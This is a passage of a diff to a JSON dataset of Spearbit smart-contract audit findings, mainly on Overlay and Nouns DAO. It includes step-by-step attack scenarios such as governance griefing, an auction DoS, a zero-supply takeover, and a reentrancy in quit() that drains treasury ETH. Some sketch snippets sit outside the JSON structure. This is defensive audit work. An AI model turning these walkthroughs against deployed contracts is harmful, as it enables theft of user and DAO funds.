config[0] = currentConfig = {initialCycleId: 1, cycleDuration = 1 days} config[1] = {initialCycleId: 101, cycleDuration = 7 days} Now, scheduling will create a config with initialCycleId: 103 and initialCycleTime = now + 3 * 1 days, but the cycle durations for cycles (100, 101, 102) are 1 days + 7 days + 7 days.", + "title": "Beware of chain dependencies", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The contracts have a few dependencies/assumptions which aren't future-proof and/or limit on which chains the code can be deployed. The AVERAGE_BLOCK_TIME is different on several EVM-based chains. On the Ethereum mainchain, the AVERAGE_BLOCK_TIME will change to 12 seconds after the merge. contract OverlayV1Market is IOverlayV1Market { ... uint256 internal constant AVERAGE_BLOCK_TIME = 14; // (BAD) TODO: remove since not futureproof ... } WETH addresses are not the same on different chains. See Uniswap Wrapped Native Token Addresses. Note: Several chains have a different native token instead of ETH. contract OverlayV1UniswapV3Feed is IOverlayV1UniswapV3Feed, OverlayV1Feed { address public constant WETH = 0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2; ... }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Users cannot resubmit a withdrawal request as per the wiki", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "As per Maple's wiki: pool-v2::PoolManager.sol#371-L382, withdrawal refresh: The withdrawal request can be resubmitted with the same amount of shares by calling pool.requestRedeem(0). However, the current implementation prevents Pool.requestRedeem() from being called where the shares_ parameter is zero.", + "title": "Move _registerMint() closer to mint() and burn()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Within functions unwind() and liquidate() there is a call to _registerMint() as well as calls to ovl.mint() and ovl.burn(). However, these two are quite a few lines apart, so it is not immediately obvious that they are related and operate on the same values. Additionally, _registerMint() also registers burns. function unwind(...) ... { ... _registerMint(int256(value) - int256(cost)); ... // 40 lines of code if (value >= cost) { ovl.mint(address(this), value - cost); } else { ovl.burn(cost - value); } ...
} function liquidate(address owner, uint256 positionId) external { ... _registerMint(int256(value) - int256(cost)); ... // 33 lines of code ovl.burn(cost - value); ... }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Accrued interest may be calculated on an overstated payment", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The checkTotalAssets() function is a useful helper that may be used to make business decisions in the protocol. However, if there is a late loan payment, the total interest is calculated on an incorrect payment interval, causing the accrued interest to be overstated. It is also important to note that late interest will also be excluded from the total interest calculation.", + "title": "Use of Math.min() is error-prone", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Function Math.min() is used in two ways: To get the smallest of two values, e.g. x = Math.min(x,y); To make sure the resulting value is >= 0, e.g. x -= Math.min(x,y); (note, there is an extra - in -=) It is easy to make a mistake because both constructs are rather similar. Note: No mistakes have been found in the code. Examples to get the smallest of two values: OverlayV1Market.sol: tradingFee = Math.min(tradingFee, value); OverlayV1Market.sol: cap = Math.min(cap, circuitBreaker(snapshot, cap)); OverlayV1Market.sol: cap = Math.min(cap, backRunBound(data)); Examples to make sure the resulting value is >= 0: OverlayV1Market.sol: oiLong -= Math.min(oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); OverlayV1Market.sol: oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); OverlayV1Market.sol: oiShort -= Math.min(oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); OverlayV1Market.sol: oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); OverlayV1Market.sol: pos.notional -= uint120(Math.min(pos.notional, pos.notionalInitial(fraction))); OverlayV1Market.sol: pos.debt -= uint120(Math.min(pos.debt, pos.debtCurrent(fraction))); OverlayV1Market.sol: pos.oiShares -= Math.min(pos.oiShares, pos.oiSharesCurrent(fraction)); OverlayV1Market.sol: oiLong -= Math.min(oiLong, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); OverlayV1Market.sol: oiLongShares -= Math.min(oiLongShares, pos.oiSharesCurrent(fraction)); OverlayV1Market.sol: oiShort -= Math.min(oiShort, pos.oiCurrent(fraction, oiTotalOnSide, oiTotalSharesOnSide)); OverlayV1Market.sol: oiShortShares -= Math.min(oiShortShares, pos.oiSharesCurrent(fraction)); Position.sol: posCost -= Math.min(posCost, posDebt);", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] },
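The two min-patterns flagged above look alike but do different things; a minimal sketch (library name hypothetical):

pragma solidity ^0.8.10;

library MinPatterns {
    function min(uint256 x, uint256 y) internal pure returns (uint256) {
        return x < y ? x : y;
    }

    // Pattern 1: plain minimum, x = Math.min(x, y)
    function smallest(uint256 x, uint256 y) internal pure returns (uint256) {
        return min(x, y);
    }

    // Pattern 2: clamped subtraction, x -= Math.min(x, y),
    // i.e. subtract y from x without ever going below zero.
    function clampedSub(uint256 x, uint256 y) internal pure returns (uint256) {
        return x - min(x, y);
    }
}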
As there is no incentive for others to liquidate this dust amount, it is up to the loan manager to incur the cost and responsibility of liquidating this amount before they can successfully call LoanManager.finishCollateralLiquidation().", + "title": "Confusing use of term burn", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "The function oiAfterFunding() contains a comment that it burns a portion of the contracts. The term burn can be confused with burning of OVL. The Overlay team clarified that: The total aggregate open interest outstanding (oiLong + oiShort) on the market decreases over time with funding. There's no actual burning of OVL. function oiAfterFunding(...) ... { ... // Burn portion of all aggregate contracts (i.e. oiLong + oiShort) // to compensate protocol for pro-rata share of imbalance liability ... return (oiOverweightNow, oiUnderweightNow); }", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Loan impairments can be unavoidably unfair for borrowers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "When a pool delegate impairs a loan, the loan's _nextPaymentDueDate will be set to the min of block.timestamp and the current _nextPaymentDueDate. If the pool delegate later decides to remove the impairment, the original _nextPaymentDueDate is restored to its correct value. The borrower can also remove an impairment themselves by making a payment. In this case, the _nextPaymentDueDate is not restored, which is always worse for the borrower. This can be unfair since the borrower would have to pay late interest on a loan that was never actually late (according to the original payment due date). Another related consequence is that a borrower can be liquidated before the original payment due date even passes (this is possible as long as the loan is impaired more than gracePeriod seconds away from the original due date).", + "title": "Document precondition for oiAfterFunding()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Function oiAfterFunding contains the following statement: uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; Nevertheless, if oiOverweightBefore < oiUnderweightBefore then this statement will revert. Luckily, the update() function makes sure this isn't the case. function oiAfterFunding(uint256 oiOverweightBefore, uint256 oiUnderweightBefore, ...) ... { ... uint256 oiImbalanceBefore = oiOverweightBefore - oiUnderweightBefore; // Could revert if oiOverweightBefore < oiUnderweightBefore ... } function update() public returns (Oracle.Data memory) { ... bool isLongOverweight = oiLong > oiShort; uint256 oiOverweight = isLongOverweight ? oiLong : oiShort; // oiOverweight is the largest of the two uint256 oiUnderweight = isLongOverweight ? oiShort : oiLong; // oiUnderweight is the smallest of the two (oiOverweight, oiUnderweight) = oiAfterFunding(oiOverweight, oiUnderweight, ...); ...
}", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "withdrawCover() vulnerable to reentrancy", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "withdrawCover() allows for reentrancy and could be abused to withdraw below the minimum cover amount and avoid having to cover protocol insolvency through a bad liquidation or loan default. The moveFunds() function could transfer the asset amount to the recipient specified by the pool delegate. Some In this case, the pool delegate could reenter the tokens allow for callbacks before the actual transfer is made. withdrawCover() function and bypass the balance check as it is made before tokens are actually transferred. This can be repeated to empty out required cover balance from the contract. It is noted that the PoolDelegateCover contract is a protocol controlled contract, hence the low severity.", + "title": "Format numbers intelligibly", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Overlay-Spearbit-Security-Review.pdf", + "body": "Solidity offers several possibilities to format numbers in a more readable way as noted below.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Overlay", + "Severity: Informational" ] }, { - "title": "Bad parameter encoding and deployment when using wrong initializers", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The initializers used to encode the arguments, when deploying a new pool in PoolDeployer, might not be the initializers that the proxy factory will use for the default version and might lead to bad parameter encoding & deployments if a wrong initializer is passed.", + "title": "Any signer can cancel a pending/active proposal to grief the proposal process", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Any proposal signer, besides the proposer, can cancel the proposal later irrespective of the number of votes they contributed earlier towards the threshold. The signer could even have zero votes because getPrior- Votes(signer,..) is not checked for a non-zero value in verifySignersCanBackThisProposalAndCountTheir- Votes() as part of the proposeBySigs() flow. This seems to be a limitation of the design described in hackmd.io/@el4d/nouns-dao-v3-spec#Cancel. With the signature-based scheme, every signer is as powerful as the proposer. As long as their combined votes meets threshold, it does not matter who contributed how much to the voting power. And assuming everyone contributed some non-zero power, they are all given the cancellation capability. However, for example, a signer/proposer with 0 voting power is treated on par with any other signer who contributed 10 Nouns towards meeting the proposal threshold. A malicious signer can sign-off on every valid proposal to later cancel it. The vulnerability arises from a lack of voting power check on signer and the cancel capability given to any signer. Example scenario: Evil, without having to own a single Noun, creates a valid signature to back every signature- based proposal from a different account (to bypass checkNoActiveProp()) and gets it included in the proposal creation process via proposeBySigs(). Evil then cancels every such proposal at will, i.e. no signature-based proposal that Evil manages to get included into, potentially all of them, will ever get executed. 
Impact: This allows a malicious griefing signer, who could really be anyone without having to own any Nouns but manages to get their signature included in the proposeBySigs(), to cancel that proposal later. This effectively gives anyone a veto power on all signature-based proposals. High likelihood + Medium impact = High severity. Likelihood is High because anyone with no special ownership (of Nouns) or special roles in the protocol frontend could initiate a signature to be accepted by the proposer. We assume no other checks (e.g. by frontends) because those are out-of-scope, not specified/documented, depend on the implementation, depend on their trust/threat models or may be bypassed with protocol actors interacting directly with the contracts. We cannot be sure of how the proposer decides on which signatures to include and what checks are actually made, because that is done offchain. Without that information, we are assuming that the proposer includes all signatures they receive. Impact is Medium because, with the Likelihood rationale, anyone can get their signature included to later cancel a signature-backed proposal, which in the worst case (again without additional checks/logic) gives anyone a veto power on all signature-based proposals to potentially bring governance to a standstill if signatures are expected to be the dominant approach forward. Even if we assume that a proposer learns to exclude a zero-vote cancelling signer (with external checks) after experiencing this griefing, the signer can move on to other unsuspecting proposers. Given that this is one of the key features of V3 UX, we reason that this permissionless griefing DoS on governance is at Medium impact. While the cancellation capability is indeed specified as the intended design, we reason that this is a risky feature for the reasons explained above. This should ideally be determined based only on the contributing voting power as suggested in our recommendation. Filtering out signers with zero voting power raises the bar from the current situation in requiring signers to have non-zero voting power (i.e. the cost of the griefing attack becomes non-zero) but will not prevent signers from transferring their voting power granting Noun(s) to other addresses, getting new valid signatures included on other signature-based proposals and griefing them later by cancelling. Equating a non-zero voting power to a veto power on all signature-based proposals in the protocol continues to be very risky.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Medium Risk" + "Nouns", + "Severity: High Risk" ] }, { - "title": "Event LoanClosed might be emitted with the wrong value", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "In the closeLoan function, the fees are obtained from the getClosingPaymentBreakdown function, which does not add refinance fees; later in the code all fees are paid by payServiceFees, which may include refinance fees. The event LoanClosed might be emitted with the wrong fee value.", + "title": "Potential Denial of Service (DoS) attack on NounsAuctionHouseFork Contract", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "The potential vulnerability arises during the initialization of the NounsAuctionHouseFork contract, which is deployed and initialized via the executeFork() function when a new fork is created.
At this stage, the state variable startNounId within the NounsTokenFork contract is set corresponding to the nounId currently being auctioned in the NounsAuctionHouse. It should be noted that the NounsAuctionHouseFork contract is initially in a paused state and requires a successful proposal to unpause it, thus enabling the minting of new nouns tokens within the fork. Based on the current structure, an attacker can execute a DoS attack through the following steps: 1. Assume the executeFork() threshold is 7 nouns and the attacker owns 8 nouns. The current nounId being auctioned is 735. 2. The attacker places the highest bid for nounId 735 in the NounsAuctionHouse contract and waits for the auction's conclusion. 3. Once the auction concludes, the attacker calls escrowToFork() with his 8 nouns, triggering the executeFork() threshold. 4. Upon invoking executeFork(), new fork contracts are deployed. Below is the state of both NounsAuctionHouseFork and NounsAuctionHouse contracts at this juncture: NounsAuctionHouseFork state: nounId -> 0 amount -> 0 startTime -> 0 endTime -> 0 bidder -> 0x0000000000000000000000000000000000000000 settled -> false NounsAuctionHouse state: nounId -> 735 amount -> 50000000000000000000 startTime -> 1686014675 endTime -> 1686101075 bidder -> 0xE6b3367318C5e11a6eED3Cd0D850eC06A02E9b90 (attacker's address) settled -> false 5. The attacker executes settleCurrentAndCreateNewAuction() on the NounsAuctionHouse contract, thereby acquiring the nounId 735. 6. Following this, the attacker invokes joinFork() on the main DAO and joins the fork with nounId 735. This action effectively mints nounId 735 within the fork and subsequently triggers a DoS state in the NounsAuctionHouseFork contract. 7. At a later time, a proposal is successfully passed and the unpause() function is called on the NounsAuctionHouseFork contract. 8. A revert occurs when the _createAuction() function tries to mint tokenId 735 in the fork (which was already minted during the joinFork() call), thus re-pausing the contract. More broadly, this could happen if the buyer of the fork DAO's startNounId (and successive ones) on the original DAO (i.e. the first Nouns that get auctioned after a fork is executed) joins the fork with those tokens, even without any malicious intent, before the fork's auction is unpaused by its governance. The application of delayed governance on the fork DAO makes this timing-based behavior more feasible: one only has to buy one or more of the original DAO tokens auctioned after the fork was executed and use them to join the fork immediately. The NounsAuctionHouseFork contract gets into a DoS state, necessitating a contract update in the NounsTokenFork contract to manually increase the _currentNounId state variable to restore the normal flow in the NounsAuctionHouseFork. High likelihood + Medium impact = High Severity. Likelihood: High, because it's a very likely scenario to happen, even unintentionally; the scenario can be triggered by a non-malicious user that just wants to join the fork with a freshly bought Noun from the auction house. Impact: Medium, because forking is bricked for at least several weeks until the upgrade proposal passes and is in place. This is not simply having a contract disabled for a period of time; this can be considered as a loss of assets for the Forked DAO as well, i.e. imagine that the Forked DAO needs funding immediately.
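A hedged sketch of the failure mode in step 8, simplified from the auction house pattern (the try/catch shape is an assumption for illustration, not quoted from the fork code): function _createAuction() internal { // nouns.mint() reverts because tokenId 735 was already minted via joinFork(), // so the catch branch pauses the auction house again, bricking new auctions. try nouns.mint() returns (uint256 nounId) { // ... start the auction for nounId } catch Error(string memory) { _pause(); } }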
On top of this, the contract upgrade would have to be done on the NounsTokenFork contract to correct the _currentNounId state variable to a valid value and fix the Denial of Service in the NounsAuctionHouseFork. Would the fork joiners be willing to perform such a risky update in such a critical contract?", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: High Risk" ] }, { - "title": "Bug in makePayment() reverts when called with small amounts", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "When makePayment() is called with an amount which is less than the fees payable, then the transaction will always revert, even if there is an adequate amount of drawable funds. The revert happens due to an underflow in getUnaccountedAmount() because the token balance is decremented on the previous line without updating drawable funds.", + "title": "Total supply can be low down to zero after the fork, allowing for execution of exploiting proposals from any next joiners", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Total supply can go down to zero during the forking period, so any holder then entering the forked DAO with joinFork() can push manipulating proposals and force all the later joiners either to rage quit or to be exploited. As an example, suppose there is a group of nouns holders that performed the fork for pure financial reasons, all claimed their forked nouns and quitted. Right after that it is block.timestamp < forkingPeriodEndTimestamp, so isForkPeriodActive(ds) == true in the original DAO contract. At the same time the forked token's adjustedTotalSupply is zero (all new tokens were sent to the timelock): NounsDAOLogicV1Fork.sol#L201-L208 function quit(uint256[] calldata tokenIds) external nonReentrant { ... for (uint256 i = 0; i < tokenIds.length; i++) { >> nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } NounsDAOLogicV1Fork.sol#L742-L744 function adjustedTotalSupply() public view returns (uint256) { return nouns.totalSupply() - nouns.balanceOf(address(timelock)); } Also, NounsTokenFork.remainingTokensToClaim() == 0, so the checkGovernanceActive() check does not revert in the forked DAO contract: NounsDAOLogicV1Fork.sol#L346-L349 function checkGovernanceActive() internal view { if (block.timestamp < delayedGovernanceExpirationTimestamp && nouns.remainingTokensToClaim() > 0) revert WaitingForTokensToClaimOrExpiration(); } Original DAO holders can enter the new DAO with joinFork() only, which will keep checkGovernanceActive() non-reverting in the forked DAO contract: NounsDAOV3Fork.sol#L139-L158 function joinFork( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, uint256[] calldata proposalIds, string calldata reason ) external { ...
for (uint256 i = 0; i < tokenIds.length; i++) { ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]); } >> NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds); emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason); } remainingTokensToClaim stays zero, as claimDuringForkPeriod() doesn't affect it: NounsTokenFork.sol#L166-L174 function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external { if (msg.sender != escrow.dao()) revert OnlyOriginalDAO(); if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); for (uint256 i = 0; i < tokenIds.length; i++) { uint256 nounId = tokenIds[i]; _mintWithOriginalSeed(to, nounId); } } In this situation both quorum and proposal thresholds will be zero, and proposals can be created with creationBlock = block.number, at which only the recently joined holders have voting power: NounsDAOLogicV1Fork.sol#L242-L305 function propose( address[] memory targets, uint256[] memory values, string[] memory signatures, bytes[] memory calldatas, string memory description ) public returns (uint256) { checkGovernanceActive(); ProposalTemp memory temp; temp.totalSupply = adjustedTotalSupply(); >> temp.proposalThreshold = bps2Uint(proposalThresholdBPS, temp.totalSupply); require( nouns.getPriorVotes(msg.sender, block.number - 1) > temp.proposalThreshold, 'NounsDAO::propose: proposer votes below proposal threshold' ); ... >> newProposal.proposalThreshold = temp.proposalThreshold; >> newProposal.quorumVotes = bps2Uint(quorumVotesBPS, temp.totalSupply); ... >> newProposal.creationBlock = block.number; DeployDAOV3NewContractsBase.s.sol#L18-L23 contract DeployDAOV3NewContractsBase is Script { ... uint256 public constant FORK_DAO_PROPOSAL_THRESHOLD_BPS = 25; // 0.25% uint256 public constant FORK_DAO_QUORUM_VOTES_BPS = 1000; // 10% This will give the first joiner full power over all the later joiners: NounsDAOLogicV1Fork.sol#L577-L589 function castVoteInternal( address voter, uint256 proposalId, uint8 support ) internal returns (uint96) { ... /// @notice: Unlike GovernerBravo, votes are considered from the block the proposal was created in order to normalize quorumVotes and proposalThreshold metrics >> uint96 votes = nouns.getPriorVotes(voter, proposal.creationBlock); Say Bob, an original nouns DAO holder with 1 noun, joined when total supply was zero; he can create proposals, and with regard to these proposals his only vote will be 100% of the DAO voting power. Bob can create a proposal to transfer all the funds to himself, or a hidden malicious one like shown in "Fork escrowers can exploit the fork or force late joiners to quit" step 6. All the later joiners will not be able to stop this proposal, no matter how big their voting power is, as votes will be counted as of the block where Bob had 100% of the votes. As the scenario above is a part of the expected workflow (i.e. all fork initiators can be reasonably expected to quit fast enough), the probability of it is medium, while the probability of inattentive late joiners being exploited by Bob's proposal is medium too (there is not much time to react and some holders might first of all want to explore the new fork functionality), so the overall probability is low, while the impact is full loss of funds for such joiners.
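To make the zero-supply state concrete, a hedged worked example using the deployment constants quoted above (the arithmetic is illustrative, not quoted from the report): // With adjustedTotalSupply() == 0 at proposal creation: uint256 proposalThreshold = bps2Uint(25, 0); // = 0, so a single noun clears the threshold uint256 quorumVotes = bps2Uint(1000, 0); // = 0, so any one vote meets quorum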
Per low combined likelihood and high impact setting the severity to be medium.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Pool.previewWithdraw always reverts but Pool.withdraw can succeed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The Pool.previewWithdraw => PM.previewWithdraw => WM.previewWithdraw function call sequence always reverts in the WithdrawalManager. However, the Pool.withdraw function can succeed. This behavior might be unexpected, especially as integrators call previewWithdraw before doing the actual withdraw call.", + "title": "Duplicate ERC20 tokens will send a greater than prorata token share leading to loss of DAO funds", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "_setErc20TokensToIncludeInFork() is an admin function for setting ERC20 tokens that are used when splitting funds to a fork. However, there are no sanity checks for duplicate ERC20 tokens in the erc20tokens parameter. While STETH is the only ERC20 token applicable for now, it is conceivable that the DAO treasury may include others in future. The same argument applies to _setErc20TokensToIncludeInQuit() and members quitting from the fork DAO. Duplicate tokens in the array will send a greater than prorata share of those tokens to the fork DAO treasury in sendProRataTreasury() or to the quitting member in quit(). This will lead to loss of funds for the original DAO and fork DAO respectively. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Setting a new WithdrawalManager locks funds in old one", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The WithdrawalManager only accepts calls from a PoolManager. When setting a new withdrawal manager with PoolManager.setWithdrawalManager, the old one cannot be accessed anymore. Any user shares locked for withdrawal in the old one are stuck.", + "title": "A malicious proposer can create arbitrary number of maliciously updatable proposals to significantly grief the protocol", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "checkNoActiveProp() is documented as: \"This is a spam protection mechanism to limit the number of proposals each noun can back.\" However, this mitigation applies to proposer addresses holding Nouns but not the Nouns themselves, because checkNoActiveProp() relies on checking the state of proposals tracked per proposer via latestProposalId = ds.latestProposalIds[proposer]. A malicious proposer can move (transfer/delegate) their Noun(s) to different addresses to circumvent this mitigation and create proposals from those new addresses to spam. Furthermore, a proposal update in the protocol does not check for the proposer meeting any voting power threshold at the time of the update. A malicious proposer can create an arbitrary number of proposals, each from a different address by transferring/delegating their Nouns, and then update any/all of them to be malicious. Substantial effort will be required to differentiate all such proposals from the authentic ones and then cancel them, leading to DAO governance DoS griefing.
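A hedged sketch of the mitigation this implies, re-checking the proposer's voting power at update time (a hypothetical guard with assumed names, not the V3 implementation): function updateProposal(uint256 proposalId, ...) external { // Sketch: require the proposer to still meet the threshold when editing, so Nouns // moved to other addresses cannot keep backing live updatable proposals. if (nouns.getPriorVotes(msg.sender, block.number - 1) <= proposalThreshold()) revert VotesBelowProposalThreshold(); // ... }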
Medium likelihood + Medium impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Use whenProtocolNotPaused on migrate() instead of upgrade() for more complete protection", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "whenProtocolNotPaused is added to migrate() for the Liquidator, MapleLoan, and WithdrawalManager contracts in order to protect the protocol by preventing it from upgrading while the protocol is paused. However, this protection happens only during upgrade, and not during instantiation.", + "title": "A malicious proposer can update proposal past inattentive voters to sneak in otherwise unacceptable details", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Updatable proposal description and transactions is a new feature being introduced in V3 to improve the UX of the proposal flow by allowing proposal editing on-chain. The motivation for this feature as described in the spec is: \"Proposals get voter feedback almost entirely only once they are on-chain. At the same time, proposers are reluctant to cancel and resubmit their proposals for multiple reasons, e.g. preferring to avoid restarting the proposal lifecycle and thus delay funding.\" However, votes are bound only to the proposal identifier and not to their description (which describes the motivation/intention/usage etc.) or the transactions (values transferred, contracts/functions of interaction etc.). Inattentive voters may (decide to) cast their votes based on a stale proposal's description/transactions which could since have been updated. For example, someone voting Yes on the initial proposal version may vote No if they see the updated details. A very small voting delay (MIN_VOTING_DELAY is 1 block) may even allow a malicious proposer to sneak in a malicious update at the very end of the updatable period so that voters do not see it in time to change their votes being cast. Delays in front-ends updating the proposal details may contribute to this scenario. A malicious proposer updates a proposal with otherwise unacceptable txs/description to get the support of inattentive voters who cast their votes based on acceptable older proposal versions. The malicious proposal passes to transfer a significant amount of treasury to unauthorized receivers for unacceptable reasons. Low likelihood + High impact = Medium severity.", "labels": [ "Spearbit", - "MapleV2.pd", - "Severity: Low Risk" + "Nouns", + "Severity: Medium Risk" ] }, { - "title": "Missing post-migration check in PoolManager.sol could result in lost funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/MapleV2.pdf", - "body": "The protocol employs an upgradeable/migrateable system that includes upgradeable initializers for factory created contracts. For the most part, a storage value that was left uninitialized due to an erroneous initializer would not affect protocol funds. For example, forgetting to initialize _locked would cause all nonReentrant functions to revert, but no funds would be lost.
However, if the poolDelegateCover address were unset and depositCover() were called, the funds would be lost as there is no to != address(0) check in transferFrom.", + "title": "NounsDAOLogicV1Fork's quit() performing external calls in-between total supply and balance reads can allow for treasury funds stealing via cross-contract reentrancy", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Nouns-Spearbit-Security-Review.pdf", + "body": "Let's suppose there is an initiative group of nouns holders that performed the fork, claimed, and immediately quitted (say for pure financial reasons). Right after that it is block.timestamp < forkingPeriodEndTimestamp, so isForkPeriodActive(ds) == true in the original DAO contract, while NounsTokenFork.remainingTokensToClaim() == 0, so checkGovernanceActive() doesn't revert in the forked DAO contract, which has no material holdings. For simplicity let's say there are Bob and Alice, both of whom aren't part of this group and still are in the original DAO; Bob has 2 nouns, Alice has 1, each noun's share of treasury is 1 stETH and 100 ETH, and erc20TokensToIncludeInQuit = [stETH]. All the above are going concern assumptions (a part of the expected workflow); let's now add a low probability one: the stETH contract was upgraded and now performs a _beforetokentransfer() callback on every transfer to a destination address as long as it's a contract (i.e. it has a callback; for simplicity let's assume it behaves similarly to ERC-721 safeTransfer). It doesn't make it malicious or break IERC20; let's just suppose there is a strong enough technical reason for such an upgrade. If Alice now decides to join this fork, Bob can steal from her: 1. Alice calls NounsDAOV3's joinFork(), 1 stETH and 100 ETH is transferred to NounsDAOLogicV1Fork: NounsDAOV3Fork.sol#L139-L158 function joinFork( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, uint256[] calldata proposalIds, string calldata reason ) external { if (!isForkPeriodActive(ds)) revert ForkPeriodNotActive(); INounsDAOForkEscrow forkEscrow = ds.forkEscrow; address timelock = address(ds.timelock); sendProRataTreasury(ds, ds.forkDAOTreasury, tokenIds.length, adjustedTotalSupply(ds)); for (uint256 i = 0; i < tokenIds.length; i++) { ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]); } NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds); emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason); } Alice is minted 1 forked noun: NounsTokenFork.sol#L166-L174 function claimDuringForkPeriod(address to, uint256[] calldata tokenIds) external { if (msg.sender != escrow.dao()) revert OnlyOriginalDAO(); if (block.timestamp > forkingPeriodEndTimestamp) revert OnlyDuringForkingPeriod(); for (uint256 i = 0; i < tokenIds.length; i++) { uint256 nounId = tokenIds[i]; _mintWithOriginalSeed(to, nounId); } } 2. Bob transfers all to an attack contract (cBob), which joins the DAO with 1 noun. The forked treasury is 2 stETH and 200 ETH; cBob and Alice both have 1 noun. 3.
cBob calls quit() and reenters NounsDAOV3's joinFork() on the stETH _beforetokentransfer() (and nothing else): NounsDAOLogicV1Fork.sol#L201-L222 function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 erc20token = IERC20(erc20TokensToIncludeInQuit[i]); uint256 tokensToSend = (erc20token.balanceOf(address(timelock)) * tokenIds.length) / totalSupply; >> bool erc20Sent = timelock.sendERC20(msg.sender, address(erc20token), tokensToSend); if (!erc20Sent) revert QuitERC20TransferFailed(); } uint256 ethToSend = (address(timelock).balance * tokenIds.length) / totalSupply; bool ethSent = timelock.sendETH(msg.sender, ethToSend); if (!ethSent) revert QuitETHTransferFailed(); emit Quit(msg.sender, tokenIds); } 4. cBob has joined the fork with another noun; the stETH transfer concludes. The forked treasury is 2 stETH and 300 ETH, while 1 stETH was just sent to cBob. 5. With quit() resumed, (address(timelock).balance * tokenIds.length) / totalSupply = (300 * 1) / 2 = 150 ETH is sent to cBob: NounsDAOLogicV1Fork.sol#L201-L222 function quit(uint256[] calldata tokenIds) external nonReentrant { checkGovernanceActive(); uint256 totalSupply = adjustedTotalSupply(); for (uint256 i = 0; i < tokenIds.length; i++) { nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } for (uint256 i = 0; i < erc20TokensToIncludeInQuit.length; i++) { IERC20 